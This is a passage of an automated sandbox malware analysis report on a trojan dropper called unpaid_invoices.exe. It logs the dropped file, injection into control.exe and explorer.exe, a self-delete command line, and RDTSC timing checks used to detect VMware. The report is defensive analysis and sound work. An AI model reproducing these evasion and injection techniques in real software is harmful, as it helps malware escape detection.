          Source: C:\Users\user\Desktop\unpaid_invoices.exeProcess created: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeProcess created: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\ronkhfyq.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
          Source: C:\Users\user\Desktop\unpaid_invoices.exeProcess created: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslqJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeProcess created: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslqJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\ronkhfyq.exe"Jump to behavior
          Source: C:\Users\user\Desktop\unpaid_invoices.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\unpaid_invoices.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000019.dbJump to behavior
          Source: C:\Users\user\Desktop\unpaid_invoices.exeFile created: C:\Users\user\AppData\Local\Temp\nsx7CF9.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@0/0
          Source: C:\Users\user\Desktop\unpaid_invoices.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\unpaid_invoices.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\unpaid_invoices.exeCode function: 0_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404ABB
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCommand line argument: nF1_2_00E145C0
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCommand line argument: nF2_2_00E145C0
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\explorer.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: unpaid_invoices.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: ronkhfyq.exe, 00000001.00000003.234061206.000000001A710000.00000004.00001000.00020000.00000000.sdmp, ronkhfyq.exe, 00000001.00000003.237833298.000000001A8A0000.00000004.00001000.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000003.239686577.0000000000E36000.00000004.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303340292.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303914689.00000000010EF000.00000040.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000003.238238247.0000000000B9E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000003.303050048.0000000003204000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000003.304479870.0000000004A09000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: ronkhfyq.exe, 00000002.00000002.303244940.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303149130.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ronkhfyq.exe, 00000001.00000003.234061206.000000001A710000.00000004.00001000.00020000.00000000.sdmp, ronkhfyq.exe, 00000001.00000003.237833298.000000001A8A0000.00000004.00001000.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000003.239686577.0000000000E36000.00000004.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303340292.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303914689.00000000010EF000.00000040.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000003.238238247.0000000000B9E000.00000004.00000800.00020000.00000000.sdmp, control.exe, control.exe, 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000003.303050048.0000000003204000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000003.304479870.0000000004A09000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\yysuo\kzzcum\izya\0db06ea2233046af83ff72ba291e1f8f\exvtus\fxibtxmq\Release\fxibtxmq.pdb source: unpaid_invoices.exe, 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmp, ronkhfyq.exe, 00000001.00000000.229638861.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp, ronkhfyq.exe, 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp, ronkhfyq.exe, 00000002.00000000.235483979.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp, control.exe, 00000011.00000002.499584872.000000000311A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000011.00000002.500336053.00000000050D7000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.462569690.0000000007497000.00000004.80000000.00040000.00000000.sdmp, nss7D29.tmp.0.dr, ronkhfyq.exe.0.dr
          Source: Binary string: control.pdbUGP source: ronkhfyq.exe, 00000002.00000002.303244940.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303149130.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E12455 push ecx; ret 1_2_00E12468
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041D662 push eax; ret 2_2_0041D668
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041D66B push eax; ret 2_2_0041D6D2
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041D615 push eax; ret 2_2_0041D668
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_0041D6CC push eax; ret 2_2_0041D6D2
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_00417EE1 pushad ; retf 2_2_00417EE2
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_00E12455 push ecx; ret 2_2_00E12468
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C1D0D1 push ecx; ret 17_2_04C1D0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EF7EE1 pushad ; retf 17_2_02EF7EE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFD6CC push eax; ret 17_2_02EFD6D2
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFD66B push eax; ret 17_2_02EFD6D2
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFD662 push eax; ret 17_2_02EFD668
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_02EFD615 push eax; ret 17_2_02EFD668
          Source: C:\Users\user\Desktop\unpaid_invoices.exeFile created: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E118A0 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00E118A0
          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\unpaid_invoices.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeRDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeRDTSC instruction interceptor: First address: 0000000000408F8E second address: 0000000000408F94 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000002EE8C04 second address: 0000000002EE8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000002EE8F8E second address: 0000000002EE8F94 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-6470
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_00408EC0 rdtsc 2_2_00408EC0
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeAPI coverage: 4.4 %
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\unpaid_invoices.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D7A
          Source: C:\Users\user\Desktop\unpaid_invoices.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,0_2_004069A4
          Source: C:\Users\user\Desktop\unpaid_invoices.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\Desktop\unpaid_invoices.exeAPI call chain: ExitProcess graph end nodegraph_0-3509
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeAPI call chain: ExitProcess graph end nodegraph_1-6471
          Source: explorer.exe, 0000001B.00000000.491150367.0000000009A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000001B.00000003.466175807.0000000009BD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000001B.00000003.441522193.0000000009C19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
          Source: explorer.exe, 0000001B.00000003.443034408.0000000009C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\H
          Source: explorer.exe, 0000001B.00000003.450410263.0000000009BEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001B.00000000.491457253.0000000009B82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}user
          Source: explorer.exe, 0000001B.00000000.464739705.0000000009AB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00{S
          Source: explorer.exe, 0000001B.00000000.473356899.0000000006505000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
          Source: explorer.exe, 00000005.00000000.249331621.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001B.00000003.443034408.0000000009C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00j
          Source: explorer.exe, 0000001B.00000003.464053628.0000000009B80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bs"
          Source: explorer.exe, 0000001B.00000003.449810104.0000000009B82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 0000001B.00000003.437309717.0000000009AF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9Tm\Device\HarddiskVolume2\??\Volume{ef47ea26-ec76-4a6e-8680-9e53b539546d}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:G
          Source: explorer.exe, 0000001B.00000003.443034408.0000000009C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.271975150.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
          Source: explorer.exe, 0000001B.00000000.491408664.0000000009B4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.Users
          Source: explorer.exe, 0000001B.00000003.441522193.0000000009C19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00y
          Source: explorer.exe, 00000005.00000000.271975150.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0cY
          Source: explorer.exe, 0000001B.00000003.490329188.0000000009B66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&
          Source: explorer.exe, 0000001B.00000003.441177582.0000000009C46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}h
          Source: explorer.exe, 0000001B.00000000.487131227.0000000006410000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.271975150.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000001B.00000003.443034408.0000000009C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001B.00000000.487131227.0000000006410000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000001B.00000000.487465818.0000000006505000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
          Source: explorer.exe, 0000001B.00000003.443034408.0000000009C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: war&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94fZ
          Source: explorer.exe, 0000001B.00000000.487465818.0000000006505000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[
